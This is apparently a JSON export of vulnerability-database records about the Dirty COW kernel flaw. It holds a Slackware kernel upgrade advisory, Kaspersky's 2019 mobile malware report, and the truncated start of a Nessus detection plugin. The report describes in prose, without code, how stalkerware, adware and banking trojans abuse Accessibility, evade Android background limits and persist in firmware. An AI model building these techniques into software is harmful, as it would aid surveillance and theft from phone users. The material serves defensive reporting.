instructions:\n\nUpgrade the packages as root:\n > upgradepkg kernel-*.txz\n\nIf you are using an initrd, you'll need to rebuild it.\n\nFor a 32-bit SMP machine, use this command (substitute the appropriate\nkernel version if you are not running Slackware 14.2):\n > /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.29-smp | bash\n\nFor a 64-bit machine, or a 32-bit uniprocessor machine, use this command\n(substitute the appropriate kernel version if you are not running\nSlackware 14.2):\n > /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.29 | bash\n\nPlease note that &quot;uniprocessor&quot; has to do with the kernel you are running,\nnot with the CPU. Most systems should run the SMP kernel (if they can)\nregardless of the number of cores the CPU has. If you aren't sure which\nkernel you are running, run &quot;uname -a&quot;. If you see SMP there, you are\nrunning the SMP kernel and should use the 4.4.29-smp version when running\nmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit\nsystems should always use 4.4.29 as the version.\n\nIf you are using lilo or elilo to boot the machine, you'll need to ensure\nthat the machine is properly prepared before rebooting.\n\nIf using LILO:\nBy default, lilo.conf contains an image= line that references a symlink\nthat always points to the correct kernel. No editing should be required\nunless your machine uses a custom lilo.conf. If that is the case, be sure\nthat the image= line references the correct kernel file. Either way,\nyou'll need to run &quot;lilo&quot; as root to reinstall the boot loader.\n\nIf using elilo:\nEnsure that the /boot/vmlinuz symlink is pointing to the kernel you wish\nto use, and then run eliloconfig to update the EFI System Partition.", "modified": "2016-10-31T20:40:05", "published": "2016-10-31T20:40:05", "id": "SSA-2016-305-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.1350971", "title": "kernel", "type": "slackware", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-03-24T11:38:55", "bulletinFamily": "blog", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Figures of the year\n\nIn 2019, Kaspersky mobile products and technologies detected:\n\n * 3,503,952 malicious installation packages.\n * 69,777 new mobile banking Trojans.\n * 68,362 new mobile ransomware Trojans.\n\n## Trends of the year\n\nIn summing up 2019, two trends in particular stick out:\n\n * Attacks on users' personal data became more frequent.\n * Detections of Trojans on the most popular application marketplaces became more frequent.\n\nThis report discusses each in more detail below, with examples and statistics.\n\n### Attacks on personal data: stalkerware\n\nOver the past year, the number of attacks on the personal data of mobile device users increased by half: from 40,386 unique users in 2018 to 67,500 in 2019. This is not about classic spyware or Trojans, but so-called [stalkerware](<https://encyclopedia.kaspersky.com/glossary/stalkerware-spouseware/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>).\n\n_Number of unique users attacked by stalkerware in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152357/mobile_report_2019_01-en-stalkerware-users.png>)\n\nStalkerware can be divided into two major categories:\n\n * Trackers.\n * Full-fledged tracking apps.\n\nThe creators of trackers generally focus on two main features: tracking victims' coordinates and intercepting text messages. Until recently, many such apps, mostly free, were available on the official Google Play marketplace. After [Google Play changed its policy](<https://play.google.com/about/privacy-security-deception/malicious-behavior/>) in late 2018, most of them were removed from the store, and most developers pulled support for their products. However, such trackers can still be found on their developers' and third-party sites.\n\nIf such an app gets onto a device, messages and data about the user's location become accessible to third parties. These third parties are not necessarily only those tracking the user: the client-server interaction of some services ignores even the minimum security requirements, allowing anyone to gain access to the accumulated data.\n\nThe situation of full-fledged stalkerware is somewhat different: there are no such apps on Google Play, but they are actively supported by developers. These tend to be commercial solutions with extensive spying capabilities. They can harvest almost any data on a compromised device: photos (both entire archives and individual pictures, for example, taken at a certain location), phone calls, texts, location information, screen taps (keylogging), and so on. \n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152711/mobile_report_2019_stalk_screen.png>)\n\n_Screenshot from the site of a stalkerware app developer showing the capabilities of the software_\n\nMany apps exploit root privileges to extract messaging history from protected storage in social networking and instant messaging applications. If it cannot gain the required access, the stalkerware can take screenshots, log screen taps and even extract the text of incoming and outgoing messages from the windows of popular services using the Accessibility feature. One example is the commercial spyware app Monitor Minor.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152741/mobile_report_2019_stalk_screen_features.png>)\n\n_Screenshot from the site of a stalkerware app developer showing the software's ability to intercept data from social networks and messengers_\n\nThe developers of the [commercial spyware FinSpy](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>) went one step further by adding a feature to intercept correspondence in secure messengers, such as Signal, Threema and others. To ensure interception, the app independently obtains root privileges by exploiting the vulnerability CVE-2016-5195, aka \"Dirty Cow\". The expectation is that the victim is using an old device with an outdated operating system kernel in which the exploit can escalate privileges to root.\n\nIt is worth noting that the user base of messaging apps includes hundreds of millions. Classic calls and texts are being used less and less, and communication \u2014 be it text messages or voice/video calls \u2014 is gradually moving to instant messaging applications. Hence the rising interest in data stored in such apps.\n\n### Attacks on personal data: advertising apps\n\nIn 2019, we observed a significant increase in the number of [adware](<https://encyclopedia.kaspersky.com/glossary/adware/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) threats, one purpose being to harvest personal data on mobile devices.\n\nThe statistics show that the number of users attacked by adware in 2019 is roughly unchanged from 2018. \n\n_Number of users attacked by adware in 2018 and 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152401/mobile_report_2019_02-en-adware-users.png>)\n\nAt the same time, the number of detected adware installation packages almost doubled from 2018.\n\n_Number of detected adware installation packages in 2018 and 2019._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152406/mobile_report_2019_03-adware-pkg.png>)\n\nThese indicators typically correlate, but not in the case of adware. This can be explained by several factors:\n\n * Adware installation packages are generated automatically and spread literally everywhere, but for some reason do not reach the target audience. It is possible that they get detected immediately after being generated and cannot propagate further. \n * Often, such apps contain nothing useful \u2014 just an adware module; so the victim immediately deletes them, assuming that they allow removing themselves.\n\nNevertheless, it is the second successive year that adware has appeared in our Top 3 detected threats. KSN statistics confirm it to be one of the most common types of threats: four places in our Top 10 mobile threats by number of users attacked in 2019 are reserved for adware-class apps, with one member of the family, HiddenAd, taking the third. \n\n| \u0412\u0435\u0440\u0434\u0438\u043a\u0442 | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 35,83 \n2 | Trojan.AndroidOS.Boogr.gsh | 8,30 \n3 | AdWare.AndroidOS.HiddenAd.et | 4,60 \n4 | AdWare.AndroidOS.Agent.f | 4,05 \n5 | Trojan.AndroidOS.Hiddapp.ch | 3,89 \n6 | DangerousObject.AndroidOS.GenericML | 3,85 \n7 | AdWare.AndroidOS.HiddenAd.fc | 3,73 \n8 | Trojan.AndroidOS.Hiddapp.cr | 2,49 \n9 | AdWare.AndroidOS.MobiDash.ap | 2,42 \n10 | Trojan-Dropper.AndroidOS.Necro.n | 1,84 \n \n_*Share of all users attacked by this type of malware in the total number of users attacked._\n\nIn 2019, mobile adware developers not only generated tens of thousands of packages, but also technically enhanced their products, in particular through the addition of techniques to bypass operating system restrictions. \n\nFor example, Android imposes certain restrictions on background operation of applications for battery-saving reasons. This negatively impacts the operation of various threats, including adware apps that like to lurk in the background and wait for, say, a new banner to arrive from C&amp;C. The introduction of such restrictions made it impossible for apps to show ads outside the context of their own window, thus starving most adware of oxygen.\n\nThe creators of the KeepMusic adware family found a smart workaround. To bypass the restrictions, their software does not request permissions like, for example, malware does. Instead, the program starts looping an MP3 file that plays silence. The operating system decides that the music player is running, and does not terminate the KeepMusic background process. As a result, the adware can request a banner from the server and display it any time. \n\n### Attacks on personal data: exploiting access to Accessibility\n\nThe year 2019 saw the appearance of the first specimen of mobile financial malware (Trojan-Banker.AndroidOS.Gustuff.a), featuring enhanced autonomy. Until then, two methods had been used to steal money from bank accounts: \n\n * **Via SMS banking on the victim end.** This is an autonomous theft technique that requires only information about the transfer recipient. This data the bot can either store in its body or receive as a command from C&amp;C. The Trojan infects the device and sends a text with a transfer request to a special bank phone number. The bank then automatically transfers the funds to the recipient from the device owner's account. Due to the increase in such theft, limits on mobile transfers have been tightened, so this attack vector has been relegated to backup.\n * **By stealing online banking credentials.** This has been the dominant method in recent years. Cybercriminals display a phishing window on the victim's device that mimics the bank's login page and reels in the victim's credentials. In this case, the cybercriminals need to carry out the transaction themselves, using the app on their own mobile device or a browser. It is possible that the bank's anti-fraud systems can detect the abnormal activity and block it, leaving the attackers empty-handed even if the victim's device is infected. \n\nIn 2019, cybercriminals mastered a third method: stealing by manipulating banking apps. First, the victim is persuaded to run the app and sign in, for example, using a fake push notification supposedly from the bank. Tapping the notification does indeed open the banking app, which the attackers, using Accessibility, gain full control over, enabling them to fill out forms, tap buttons, etc. Moreover, the bot operator does not need to do anything, because the malware performs all actions required. Such transactions are trusted by banks, and the maximum transfer amount can exceed the limits of SMS banking by an order of magnitude. As a result, the cybercriminals can clean out the account in one go. \n\nStealing funds from bank accounts is just one malicious use of Accessibility. In effect, any malware with these permissions can control all on-screen processes, while any Android app is basically a visual representation of buttons, data entry forms, information display, and so on. Even if developers implement their own control elements, such as a slider that needs to be moved at a certain speed, this too can be done using Accessibility commands. Thus, cybercriminals have tremendous leeway to create what are perhaps the most dangerous classes of mobile malware: spyware, banking Trojans and ransomware Trojans.\n\nThe misuse of the Accessibility features poses a serious threat to users' personal data. Where previously cybercriminals had to [overlay](<https://encyclopedia.kaspersky.com/glossary/overlaying-overlay-attack/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) phishing windows and request a bunch of permissions in order to steal personal information, now victims themselves output all necessary data to the screen or enter it in forms, where it can be easily gleaned. And if the malware needs more, it can open the Settings section by itself, tap a few buttons, and obtain the necessary permissions. \n\n### Mobile Trojans on popular marketplaces: Google Play\n\nSlipping malware into the main Android app store delivers much better results than social engineering victims into installing apps from third-party sources. In addition, this approach enables attackers to:\n\n * Bypass SafetyNet, Android's built-in antivirus protection. If a user downloads an app from Google Play, the likelihood that it will be installed without additional requests \u2014 for example, to disable the built-in protection under an imaginary pretext \u2014 is very high. The only thing that can protect the user from infection in that situation is a third-party security solution.\n * Overcome psychological barriers. Official app stores enjoy far greater trust than third-party \"markets,\" and act as store windows of sorts that can be used for distributing software much more efficiently.\n * Target victims without unnecessary spending. Google Play can be used to host fakes that visually mimic, say, popular banking apps. This was the distribution vector used in a spate of attacks on mobile users in Brazil: we detected [numerous malicious programs](<https://securelist.com/it-threat-evolution-q1-2019-statistics/90916/>) on Google Play under the guise of mobile apps for Brazilian banks.\n\nIn addition to malicious doppelgangers, cybercriminals deployed several other tricks to maximize device infection rates: \n\n * The [case of CamScanner](<https://securelist.com/dropper-in-google-play/92496/>) showed that an app's legitimate behavior can be supplemented with malicious functions by updating its code for handling advertising. This could be described as the most sophisticated attack vector, since its success depends on a large number of factors, including the user base of the host app, the developer's trust in third-party advertising code and the type of malicious activity. \n * [Another example](<https://securelist.com/mobile-subscriptions/91211/>) demonstrates that attackers sometimes upload to Google Play fairly well-behaved apps from popular user categories. In this case, it was photo editors. \n * The most depressing case involves a Trojan from the Joker family, of which we have found many samples on Google Play, and still are. Deploying the tactic of mass posting, cybercriminals uploaded apps under all kinds of guises: from wallpaper-changing tools and security solutions to popular games. In some cases, the Trojan scored hundreds of thousands of downloads. No other attack vector can reach this kind of audience within such a short space of time.\n\nThe good news is that Google and the antivirus industry have [teamed up](<https://security.googleblog.com/2019/11/the-app-defense-alliance-bringing.html>) to fight threats on the site. This approach should prevent most malware from penetrating the official Google app store.\n\n## Statistics\n\nIn 2019, we discovered 3,503,952 mobile malicious installation packages, which is 1,817,190 less than in the previous year. We have not detected so few mobile threats since 2015.\n\n_Number of mobile malicious installation packages for Android in 2015\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152410/mobile_report_2019_04-total-apk.png>)\n\nFor three consecutive years, we have seen an overall decline in the number of mobile threats distributed as installation packages. The picture largely depends on specific cybercriminal campaigns: some have become less active, others have completely ceased, and new players have yet to gain momentum. \n\nThe situation is similar with the number of attacks using mobile threats: whereas in 2018 we observed a total of **116.5 million** attacks, in 2019 the figure was down to **80 million**.\n\n_Number of attacks defeated by Kaspersky mobile solutions in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152415/mobile_report_2019_05-en-total-attacks.png>)\n\nThe figures were back to the year before, before the start of the Asacub banking Trojan epidemic.\n\nSince the number of attacks correlates with the number of users attacked, we observed a similar picture for this indicator.\n\n_Number of users attacked by mobile malware in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152419/mobile_report_2019_06-en-total-attack-users.png>)\n\n_Geography of attacked users in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152424/mobile_report_2019_07-en-geo-attack-users.png>)\n\n**Top 10 countries by share of users attacked by mobile malware:**\n\nCountry* | %** \n---|--- \nIran | 60.64 \nPakistan | 44.43 \nBangladesh | 43.17 \nAlgeria | 40.20 \nIndia | 37.98 \nIndonesia | 35.12 \nNigeria | 33.16 \nTanzania | 28.51 \nSaudi Arabia | 27.94 \nMalaysia | 27.36 \n \n_*Excluded from the rankings are countries with fewer than 25,000 active users of Kaspersky mobile security solutions in the reporting period._ \n_**Unique users attacked in the country as a percentage of all users of Kaspersky mobile security solutions in the country._\n\nIn 2019, Iran (60.64%) again topped the list for the third year in a row. The most common threats in that country come from adware and potentially unwanted software: Trojan.AndroidOS.Hiddapp.bn, AdWare.AndroidOS.Agent.fa, and RiskTool.AndroidOS.Dnotua.yfe.\n\nPakistan (44.43%) climbed from seventh to second place, mainly on the back of a rise in the number of users attacked by adware. The largest contribution was made by members of the AdWare.AndroidOS.HiddenAd family. A similar picture can be seen in Bangladesh (43.17%), whose share has grown due to the same adware families. \n\n### Types of mobile threats\n\n_Distribution of new mobile threats by type in 2018 and 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152430/mobile_report_2019_08-en-threat-types.png>)\n\nIn 2019, the share of RiskTool-class threats decreased by 20 p.p. (32.46%). We believe the main reason to be the sharp drop in the generation of threats from the SMSreg family. A characteristic feature of this family is payments via SMS: for example, money transfers or subscriptions to mobile services. Moreover, the user is not explicitly informed of the payment or money being charged to their mobile account. Whereas in 2018, we picked up 1,970,742 SMSreg installation packages, the number decreased by an order of magnitude to 193,043 in 2019. At the same time, far from declining, the number of packages of other members of this class of threats increased noticeably.\n\n| Name of family | %* \n---|---|--- \n1 | Agent | 27.48 \n2 | SMSreg | 16.89 \n3 | Dnotua | 13.83 \n4 | Wapron | 13.73 \n5 | SmsSend | 9.15 \n6 | Resharer | 4.62 \n7 | SmsPay | 3.55 \n8 | PornVideo | 2.51 \n9 | Robtes | 1.23 \n10 | Yoga | 1.03 \n \n_*Share of packages of this family in the total number of riskware-class packages detected in 2019._\n\nSkymobi and Paccy dropped out of the Top 10 families of potentially unwanted software; the number of installation packages of these families detected in 2019 decreased tenfold. Their creators likely minimized or even ceased their development and distribution. However, a new player appeared: the Resharer family (4.62%), which ranked sixth. This family is noted for its self-propagation through posting information about itself on various sites and mailing it to the victim's contacts.\n\nAdware demonstrated the most impressive growth, up by 14 p.p. The main source of this growth was HiddenAd (26.81%); the number of installation packages of this family increased by two orders of magnitude against 2018. \n\n| Name of family | %* \n---|---|--- \n1 | HiddenAd | 26.81 \n2 | MobiDash | 20.45 \n3 | Ewind | 16.34 \n4 | Agent | 15.27 \n5 | Dnotua | 5.51 \n6 | Kuguo | 1.36 \n7 | Dowgin | 1.28 \n8 | Triada | 1.20 \n9 | Feiad | 1.01 \n10 | Frupi | 0.94 \n \n_*Share of packages of this family in the total number of adware-class packages detected in 2019._\n\nSignificant growth also came from the MobiDash (20.45%) and Ewind (16.34%) families. Meanwhile, the Agent family (15.27%), which held a leading position in 2018, dropped to fourth place.\n\nCompared to 2018, the number of mobile Trojans detected decreased sharply. A downward trend has been observed for two consecutive years now, yet droppers remain one of the most numerous malware classes. The [Hqwar family](<https://securelist.com/hqwar-the-higher-it-flies-the-harder-it-drops/93689/>) showed the most notable decrease: down from 141,000 packages in 2018 to 22,000 in 2019. At the same time, 2019 saw the debut of the Ingopack family: we detected 115,654 samples of this dropper. \n\nMeanwhile, the share of Trojan-class threats rose by 6 p.p., with the two most numerous malware families of this class being Boogr and Hiddapp. The Boogr family contains various Trojans that have been detected using machine-learning (ML) technology. A feature of the Hiddapp family is that it hides its icon in the list of installed apps while continuing to run in the background.\n\nThe share of mobile ransomware Trojans slightly increased. The Top 3 families of this class of threats remained the same as in 2018: Svpeng, Congur, and Fusob \u2014 in that order. \n\n### Top 20 mobile malware programs\n\nThe following malware rankings omit potentially unwanted software, such as RiskTool and AdWare.\n\n| Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 49.15 \n2 | Trojan.AndroidOS.Boogr.gsh | 10.95 \n3 | Trojan.AndroidOS.Hiddapp.ch | 5.19 \n4 | DangerousObject.AndroidOS.GenericML | 5.08 \n5 | Trojan-Dropper.AndroidOS.Necro.n | 3.45 \n6 | Trojan.AndroidOS.Hiddapp.cr | 3.28 \n7 | Trojan-Banker.AndroidOS.Asacub.snt | 2.35 \n8 | Trojan-Dropper.AndroidOS.Hqwar.bb | 2.10 \n9 | Trojan-Dropper.AndroidOS.Lezok.p | 1.76 \n10 | Trojan-Banker.AndroidOS.Asacub.a | 1.66 \n11 | Trojan-Downloader.AndroidOS.Helper.a | 1.65 \n12 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.60 \n13 | Trojan-Downloader.AndroidOS.Necro.b | 1.59 \n14 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 \n15 | Exploit.AndroidOS.Lotoor.be | 1.46 \n16 | Trojan.AndroidOS.Hiddapp.cf | 1.35 \n17 | Trojan.AndroidOS.Dvmap.a | 1.33 \n18 | Trojan-Banker.AndroidOS.Agent.ep | 1.31 \n19 | Trojan.AndroidOS.Agent.rt | 1.28 \n20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.14 \n \n_*Share of users attacked by this type of malware out of all attacked users_\n\nAs we wrap up the year 2019, first place in our Top 20 mobile malware, as in previous years, goes to the verdict DangerousObject.Multi.Generic (49.15%), which we use for malware detected with cloud technology. The verdict is applied where the antivirus databases still have no signatures or heuristics for malware detection. This way, the most recent malware is uncovered.\n\nIn second place came the verdict Trojan.AndroidOS.Boogr.gsh (10.95%). This verdict is assigned to files recognized as malicious by our ML-based system. Another result of this system's work is objects with the verdict DangerousObject.AndroidOS.GenericML (5.08%, fourth place in the rating). This verdict is assigned to files whose structure is identical to that of malicious files.\n\nThird, sixth, and sixteenth places were taken by members of the Hiddapp family. We assign this verdict to any app that hides its icon in the list of apps immediately after starting. Subsequent actions of such apps may be anything from downloading or dropping other apps to displaying ads.\n\nFifth and thirteenth places went to members of the Necro family of droppers and loaders. In both threat classes, Necro members did not make it into the Top 10 by number of detected files. Even the weakened Hwar family of droppers strongly outperformed Necro by number of generated objects. That said, users often encountered Necro members due to the family's penetration of Google Play.\n\nSeventh and tenth places went to the Asacub family of banking Trojans. Whereas at the start of the year, the Trojan's operators were still actively spreading the malware, starting in March 2019, we noticed a drop in this family's activity. \n\n_Number of unique users attacked by the Asacub mobile banking Trojan in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152434/mobile_report_2019_09-en-asacub-attacks.png>)\n\nEighth and fourteenth places were reserved for droppers in the Hqwar family. Their activity dropped significantly from 80,000 attacked users in 2018 to 28,000 in 2019. However, we continue to register infection attempts by this family, and do not rule out its return to the top.\n\n_Number of unique users attacked by the Hqwar mobile dropper in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152439/mobile_report_2019_10-en-hqwar-attacks.png>)\n\nIn ninth position is another dropper, this time from the Lezok family: Trojan-Dropper.AndroidOS.Lezok.p (1.76%). A notable difference between this Trojan and Hqwar is that the malware penetrates the device before it arrives at the store. This is evidenced by KSN statistics showing that the Trojan was most often detected in the system directory under the names PhoneServer, GeocodeService, and similar. \n\n| Path to the detected threat | Number of unique users attacked \n---|---|--- \n1 | /system/priv-app/PhoneServer/ | 49,688 \n2 | /system/priv-app/GeocodeService/ | 9747 \n3 | /system/priv-app/Helper/ | 6784 \n4 | /system/priv-app/com.android.telephone/ | 5030 \n5 | /system/priv-app/ | 1396 \n6 | /system/priv-app/CallerIdSearch/ | 1343 \n \nWhen the device is turned on, Lezok dumps its payload into the system; it does so even if the victim deletes the dumped files using regular OS tools or resets the device to the factory settings. The trick is that the Trojan forms part of the factory firmware and can reload (restore) the deleted files.\n\nThe final Trojan worthy of attention is Trojan-Downloader.AndroidOS.Helper.a (1.56%), which finished eleventh in the rankings. Despite claims to the contrary, it can be removed. However, the infected system contains another Trojan that installs a helper app, which cannot be removed that easily. According to KSN statistics, members of the Trojan-Downloader.AndroidOS.Triada and Trojan.AndroidOS.Dvmap families can act as delivery vehicles for the helper. After the victim removes the helper, a member of one of these two families loads and reinstalls it. \n\n### Mobile banking Trojans\n\nIn 2019, we detected 69,777 installation packages for mobile banking Trojans, which is half last year's figure. However, the share of banking Trojans out of all detected threats grew slightly as a consequence of the declining activity of other classes and families of mobile malware.\n\n_Number of installation packages of mobile banking Trojans detected by Kaspersky in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152443/mobile_report_2019_11-bankers-install-packages.png>)\n\nThe number of detected installation packages for banking Trojans as well as the number of attacks were influenced by the campaign to distribute the Asacub Trojan, whose activity has plummeted starting in April 2019. \n\n_Number of attacks by mobile banking Trojans in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152448/mobile_report_2019_12-en-bankers-attacks.png>)\n\nIt is worth noting that the average number of attacks over the year was approximately 270,000 per month. \n\n**Top 10 countries by share of users attacked by banking Trojans**\n\n| Country | %* \n---|---|--- \n1 | Russia | 0.72 \n2 | South Africa | 0.66 \n3 | Australia | 0.59 \n4 | Spain | 0.29 \n5 | Tajikistan | 0.21 \n6 | Turkey | 0.20 \n7 | USA | 0.18 \n8 | Italy | 0.17 \n9 | Ukraine | 0.17 \n10 | Armenia | 0.16 \n \n_*Share of users attacked by mobile bankers out of all attacked users_\n\nRussia (0.72%) has headed our Top 10 for three consecutive years: many different Trojan families are focused on stealing credentials from Russian banking apps. These Trojans operate in other countries as well. Thus, Asacub is the number one threat in Tajikistan, Ukraine, and Armenia, while the Svpeng family of Trojans is active in Russia and the US.\n\nIn South Africa (0.66%), the most common Trojan was Trojan-Banker.AndroidOS.Agent.dx, accounting for 95% of all users attacked by banking threats. \n\nThe most widespread Trojan in Australia (0.59%) was Trojan-Banker.AndroidOS.Agent.eq (77% of all users attacked by banking threats).\n\nIn Spain (0.29%), banking malware from the Cebruser and Trojan-Banker.AndroidOS.Agent.ep families are popular with cybercriminals (49% and 22% of all users attacked by banking threats, respectively).\n\n**Top 10 families of mobile bankers in 2019**\n\n| Family | %* \n---|---|--- \n1 | Asacub | 44.40 \n2 | Svpeng | 22.40 \n3 | Agent | 19.06 \n4 | Faketoken | 12.02 \n5 | Hqwar | 3.75 \n6 | Anubis | 2.72 \n7 | Marcher | 2.07 \n8 | Rotexy | 1.46 \n9 | Gugi | 1.34 \n10 | Regon | 1.01 \n \n_*Share of users attacked by this family of mobile bankers out of all users attacked by mobile banking Trojans_\n\n### Mobile ransomware Trojans\n\nIn 2019, we detected 68,362 installation packages for ransomware Trojans, which is 8,186 more than in the previous year. However, we observed a decline in the generation of new ransomware packages throughout 2019. The minimum was recorded in December. \n\n_Number of new installation packages for mobile banking Trojans in Q1\u2013Q4 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152452/mobile_report_2019_13-ransomware-packages.png>)\n\nA similar picture is seen for attacked users. Whereas in early 2019, the number of attacked users peaked at 12,004, by the end of the year, the figure had decreased 2.6 times.\n\n_Number of users attacked by mobile ransomware Trojans in 2018\u20132019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152457/mobile_report_2019_14-en-ransom-attack-users.png>)\n\n_Countries by share of users attacked by mobile ransomware in 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/02/24152502/mobile_report_2019_15-en-ransomware-geo.png>)\n\n**Top 10 countries by share of users attacked by ransomware Trojans**\n\n| Country* | %** \n---|---|--- \n1 | USA | 2.03 \n2 | Kazakhstan | 0.56 \n3 | Iran | 0.37 \n4 | Mexico | 0.11 \n5 | Saudi Arabia | 0.10 \n6 | Pakistan | 0.10 \n7 | Canada | 0.10 \n8 | Italy | 0.09 \n9 | Indonesia | 0.08 \n10 | Australia | 0.06 \n \n_*Excluded from the rating are countries with fewer than 25,000 active users of Kaspersky mobile solutions in the reporting period. \n**Unique users attacked by mobile ransomware in the country as a percentage of all users of Kaspersky mobile solutions in the country._\n\nFor the third year in a row, first place by share of users attacked by mobile ransomware went to the US (2.03%). Same as last year, the Svpeng ransomware family was the most commonly encountered in the country. It was also the most widespread in Iran (0.37%).\n\nThe situation in Kazakhstan (0.56%) was unchanged: the country still ranks second, and the most prevalent threat there remains the Rkor family. \n\n## Conclusion\n\nThe year 2019 saw the appearance of several highly sophisticated mobile banking threats, in particular, malware that can interfere with the normal operation of banking apps. The danger they pose cannot be overstated, because they cause direct losses to the victim. It is highly likely that this trend will continue into 2020, and we will see more such high-tech banking Trojans.\n\nAlso in 2019, attacks involving the use of mobile stalkerware became more frequent, the purpose being to monitor and collect information about the victim. In terms of sophistication, stalkerware is keeping pace with its malware cousins. It is quite likely that 2020 will see an increase in the number of such threats, with a corresponding rise in the number of attacked users.\n\nJudging by our statistics, adware is gaining ever more popularity among cybercriminals. In all likelihood, going forward we will encounter new members of this class of threats, with the worst-case scenario involving adware modules pre-installed on victims' devices.\n\n[](<https://www.brighttalk.com/webcast/15591/388802?utm_source=securelist&utm_medium=blog&utm_campaign=gl_webinar-yara-2020_sl0099&utm_content=link&utm_term=gl_securelist__sl0099_link_blog_webinar-yara-2020>)", "modified": "2020-02-25T10:00:43", "published": "2020-02-25T10:00:43", "id": "SECURELIST:B700542D10BA5EEA36C5D69A24B3C6EE", "href": "https://securelist.com/mobile-malware-evolution-2019/96280/", "type": "securelist", "title": "Mobile malware evolution 2019", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-05-01T01:59:09", "bulletinFamily": "scanner", "description": "Description of changes:\n\n[2.6.39-400.286.3.el6uek]\n- mm, gup: close FOLL MAP_PRIVATE race (Linus Torvalds) [Orabug: \n24928646] {CVE-2016-5195}", "modified": "2020-05-02T00:00:00", "id": "ORACLELINUX_ELSA-2016-3634.NASL", "href": "https://www.tenable.com/plugins/nessus/94225", "published": "2016-10-24T00:00:00", "title": "Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2016-3634) (Dirty COW)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-3634.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94225);\n script_version(\"2.18\");\n script_cvs_date(\"Date: 2019/09/27 13:00:37\");\n\n script_cve_id(\"CVE-2016-5195\");\n script_xref(name:\"IAVA\", value:\"2016-A-0306\");\n\n script_name(english:\"Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2016-3634) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.39-400.286.3.el6uek]\n- mm, gup: close FOLL MAP_PRIVATE race (Linus Torvalds) [Orabug: \n24928646] {CVE-2016-5195}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-October/006431.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-October/006432.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", 